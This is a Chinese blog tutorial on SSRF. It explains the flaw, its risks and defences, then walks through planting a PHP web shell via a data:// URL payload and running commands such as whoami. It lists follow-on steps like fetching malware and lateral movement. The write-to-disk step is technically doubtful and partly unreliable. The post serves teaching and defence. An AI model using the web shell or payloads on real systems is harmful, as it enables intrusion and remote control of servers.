SSRF实现

最新推荐文章于 2024-10-02 15:25:42 发布
最新推荐文章于 2024-10-02 15:25:42 发布
阅读量606 收藏 20
点赞数 20
文章标签: 网络 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_66049874/article/details/141614405
版权

SSRF介绍:

SSRF (Server-Side Request Forgery) 是一种网络安全漏洞,攻击者利用此漏洞从易受攻击的服务器向其他服务器或服务发送请求。SSRF 攻击通常利用目标服务器上的应用程序具有发出请求的功能,例如 HTTP 请求。以下是 SSRF 的一些关键点:

 SSRF 的工作原理

  1. 发出请求的能力: SSRF 攻击依赖于目标服务器能够发出网络请求(通常是 HTTP 请求)。应用程序通过用户输入或其他手段构造请求。
  2. 操控请求: 攻击者利用不当验证或过滤的输入来操控服务器发出的请求,通常是通过 URL 的形式。服务器可能会访问攻击者指定的任意地址,而不仅仅是预期的安全范围内的资源。
  3. 攻击目标: SSRF 攻击的目标可能包括内部系统(例如公司内部的管理接口)本地文件系统(通过文件协议访问)云服务元数据(例如 AWS 的 EC2 元数据服务)等。

SSRF 攻击的潜在风险

  1. 获取敏感信息: 攻击者可以访问内部网络资源或云服务元数据,获取敏感信息,如凭证、系统配置等。
  2. 执行任意操作: 如果目标应用具备特定的功能,攻击者可能操纵这些功能来执行任意操作,如发送电子邮件、执行数据库查询等。
  3. 绕过防火墙: SSRF 可以被用来访问受防火墙保护的内部网络资源,绕过网络边界防护。

SSRF 防御措施

  1. 限制外部请求: 应用程序应限制允许访问的外部资源,只允许白名单中的地址或域名。
  2. 输入验证与过滤: 过滤用户输入中的协议(例如,只允许 HTTP/HTTPS 协议),并对用户提供的 URL 进行严格验证。
  3. 网络隔离: 将应用服务器与内部系统或敏感资源进行网络隔离,避免直接网络访问。
  4. 使用 Web 应用防火墙 (WAF)**: 使用 WAF 可以检测和阻止潜在的 SSRF 攻击模式。

ssrf实现.SSH未创建写shell基本过程:

在渗透测试中,Server-Side Request Forgery (SSRF) 漏洞可以通过利用服务器发起请求访问内部网络或服务,甚至执行命令。在某些情况下,如果 SSH 访问未配置或无法创建 SSH 连接,我们仍然可以通过 SSRF 漏洞来写入一个 Web Shell,从而获取服务器的访问权限。这篇博客将展示如何利用 SSRF 漏洞来写入 Web Shell,并最终获得远程控制权限。

前提条件:

  1. 目标服务器存在 SSRF 漏洞:服务器可以通过用户输入来请求其他 URL。
  2. 服务器对文件系统的写入权限:需要目标服务器能够将请求的内容写入文件系统中。
  3. 能够通过 Web 访问写入的内容:写入的 Web Shell 文件可以通过浏览器访问执行。

环境设置:

假设我们有一个目标服务器,其上运行着一个易受攻击的 Web 应用程序。此应用程序接受一个 URL 作为输入并从该 URL 加载内容。例如:

http://vulnerable-app.com/fetch?url=http://example.com

`url` 参数是 SSRF 漏洞的利用点,我们将通过它来进行攻击。

SSRF 利用步骤:

确认 SSRF 漏洞的存在:

首先,我们需要确认目标应用是否存在 SSRF 漏洞。可以尝试使用 `curl` 命令或浏览器发送请求来访问内部资源,比如:

http://vulnerable-app.com/fetch?url=http://localhost

如果服务器响应内容来自 `localhost`,则表明存在 SSRF 漏洞。

探测服务器的写入位置

在利用 SSRF 写入 Web Shell 之前,需要确认服务器是否存在可以写入的目录。通常可以尝试访问 `/var/www/html` 或其他 Web 目录。如果服务器允许我们通过 SSRF 将数据写入这些目录,我们就可以利用该漏洞。

准备 Web Shell

Web Shell 通常是一个简单的脚本文件,允许攻击者远程执行命令。以下是一个常见的 PHP Web Shell 示例:

<?php system($_GET['cmd']); ?>

保存为 `shell.php` 文件。

利用 SSRF 写入 Web Shell

为了利用 SSRF 漏洞写入 Web Shell,我们可以通过请求带有 Web Shell 代码的 URL 来欺骗服务器将内容保存到一个可以访问的目录中。假设服务器能够将请求内容保存到 `/var/www/html` 目录,我们可以使用如下请求:

http://vulnerable-app.com/fetch?url=data://text/plain,<?php system($_GET['cmd']); ?>

这里,我们使用了 `data` 协议,它允许我们将原始数据作为 URL 提供。在这个例子中,我们将 PHP 代码作为数据传递。

访问 Web Shell

一旦 Web Shell 被写入目标服务器的 Web 目录,我们可以通过浏览器访问该脚本并执行命令。例如:

http://vulnerable-app.com/shell.php?cmd=whoami

这将执行 `whoami` 命令并返回结果。

进一步利用

通过 Web Shell,我们可以执行任意命令,进一步渗透目标服务器。

常见的操作包括:

        - 下载和执行恶意软件。
        - 获取系统信息。
        - 执行横向移动攻击。

安全措施

为了防止 SSRF 攻击,开发者和系统管理员应采取以下措施:

输入验证:对用户输入的 URL 进行严格的白名单验证,仅允许访问可信任的域名。
网络隔离:限制 Web 应用服务器与内部网络的通信能力。
禁用不必要的协议:禁用 `file://`、`gopher://` 等不必要的协议。
日志监控:监控服务器的请求日志以检测异常的内部请求行为。

清源了了
关注
ssrf实现.SSH未创建写shell
08-26
redis
SSRF(Server Side Request Forgery,SSRF)漏洞.pdf
07-05
由于服务器通常位于网络边界设备的“安全”区域内,攻击者如果能够利用 SSRF 漏洞,便有可能访问到内网设备、服务或数据,实现数据泄露或攻击内网其他系统。另外,攻击者还可以利用 SSRF 漏洞进行端口扫描、获取敏感...
ssrf实现
Theudq的博客
08-25 948
SSRF漏洞(服务器端请求伪造):是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)。
SSRF漏洞实现
dragon的博客
08-25 775
其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。
ssrf简单实现
wzzzzz06的博客
08-28 911
镜像站加速配置daemon.json我试了发现不适用,docker run会在Pulling fs layer卡住,访问github.com发现问题:windows开vpn能访问,但是虚拟机不能访问,于是指定vpn的端口让虚拟机吃到VPN加速。windows访问ubuntu的8765端口可以跳转到pikachu平台,记得安装时要配置数据库密码,下拉至ssrf模块可以看到curl,使用dict可以查看哪个端口被启用服务,如图是3306端口。
ssrf漏洞实现
m0_64998040的博客
08-28 301
此时虽然有curl_exec()函数,是ssrf,但是他将'file','dict','127.0.0.1','localhost'都过滤掉了。回车之后发现不能执行,我们尝试把路径改到upload目录,再次写入木马,在访问upload/shell.php发现成功执行。这里使用gopher,选择默认路径,先编写一个一句话木马看看能否入侵。这里看到他写入的是一个shell.php文件。这里有info参数,一会可以看一下有没有有用的信息。这里6379的端口也是开放的。
SSRF漏洞详解
热门推荐
qq_48904485的博客
03-22 2万+
一、SSRF概述 SSRF全称为Server-side Request Fogery,中文含义为服务器端请求伪造,漏洞产生的原因是服务端提供了能够从其他服务器应用获取数据的功能,比如从指定的URL地址获取网页内容,加载指定地址的图片、数据、下载等等。 一般情况下,我们服务端请求的目标都是与该请求服务器处于同一内网的资源服务,但是如果没有对这个请求的目标地址、文件等做充足的过滤和限制,攻击者可通过篡改这个请求的目标地址来进行伪造请求,所以这个漏洞名字也叫作“服务器请求伪造”。 利用SSRF能实现以下效果: 1
ssrf实现.SSH未创建写shell,同时完成其他漏洞复现
m0_74608722的博客
08-26 903
服务器会根据用户提交的URL发送一个HTTP请求。使用用户指定的URL,Web应用可以获取图片或者文件资源等。典型的例子是百度识图功能。如果没有对用户提交URL和远端服务器所返回的信息做合适的验证或过滤,就有可能存在“请求伪造"的缺陷。“请求伪造”,顾名思义,攻击者伪造正常的请求,以达到攻击的目的。如果“请求伪造”发生在服务器端,那这个漏洞就叫做“服务器端请求伪造”,英文名字Server Side Request Forgery,简称SSRF。SSRF是一种由攻击者发起的伪造服务器发送的请求的一种攻击。
完成课题ssrf实现.SSH未创建写shell,同时完成其他漏洞复现
plzdonotlietome的博客
08-25 1613
完成课题ssrf实现.SSH未创建写shell,同时完成其他漏洞复现
SSRF简介及漏洞实现
2301_80177550的博客
08-25 722
可以看到这块的本地ip地址暴露出来,那么就绕过了127.0.0.1和localhost了,我们用http协议先试下能不能探测出端口,因为探测端口我们在前端看不出什么信息,那使用bp快速爆破下,查看报文的长度看能否爆出一些信息。image=URL]接着想,在真实项目中,不太可能只有一台主机,在一个内网中是有很多主机,并且地址也是同网段或者连续的,既然这个主机没有我们找到漏洞,那我们扫一下有没有别的主机就行。一般情况下,都是放在/var/www/html下面,但不保证他会不会改,一般都是怕麻烦不会改的。
WebLogic SSRF 及漏洞修复
11-25
WebLogic SSRF(Server Side Request Forgery)是一种网络安全漏洞,攻击者可以通过控制Web应用去发起针对内网或者外网的服务请求,实现对目标系统的攻击。本文将详细介绍WebLogic SSRF的工作原理、攻击案例以及CVE-...
SSRF bible. Cheatsheet
08-06
- 描述了如何通过SSRF攻击实现各种系统的利用和信息泄露。 7. 相关资源和工具: - 提供了进一步研究和工具使用的链接和参考。 文档强调了SSRF攻击的普遍性和攻击者的创造性。因为攻击者可以使用服务器作为代理来...
毕业设计——springboot+netty+websocket实现一个简单的ChatGpt机器人聊天
【CSDN】
09-29 637
WebSocket是html5开始浏览器和服务端进行全双工通信的网络技术。在该协议下,与服务端只需要一次握手,之后建立一条快速通道,开始互相传输数据,实际是基于TCP双向全双工,比http半双工提高了很大的性能,常用于网络在线聊天室等。申请key的教程在项目resources目录readme.md文件中。1、接入了chatGpt接口,只需要替换成自己的key就行。2、实现了与机器人的聊天,可以优化做成智能客服。
组播基础-1
DC_BLOG的博客
09-27 866
信息的发送者为:组播源 接受相同信息的接收者构成一个组播组,并且每个接收者都是组播组成员 提供组播功能的路由器成为:组播组路由器 组播路由器不仅提供组播路由功能,也提供组成员管理功能,也可以是组播组成员
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
2401_84466224的博客
09-27 1202
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成中文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
从零开始实现RPC框架---------项目介绍及环境准备
最新发布
qq_41934502的博客
10-02 324
从零开始实现rpc架构项目介绍
什么是“0day漏洞”?
分享关于Java编程、数据库管理和信息安全方面的最佳实践
09-29 591
0day漏洞是信息安全中的“幽灵”,因为它的隐蔽性和破坏性往往超出我们的预期。虽然普通用户和企业无法完全规避0day漏洞,但通过保持良好的安全习惯和使用合适的防护工具,可以在一定程度上降低受到0day攻击的风险。信息安全永远在变,防护措施也需要不断更新。在快速发展的网络环境中,我们只有时刻保持警惕,才能最大限度地保护我们的数据和隐私。
利用编程语言漏洞:SSRF全攻略与案例分析
同时,还讨论了如何通过SSRF实现协议走私(Protocol Smuggling),即利用合法的服务接口来传输不期望的数据类型,如HTTP协议走私Elasticsearch、CouchDB等数据库,或者使用文本基础协议如FTP、SMTP进行通信。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值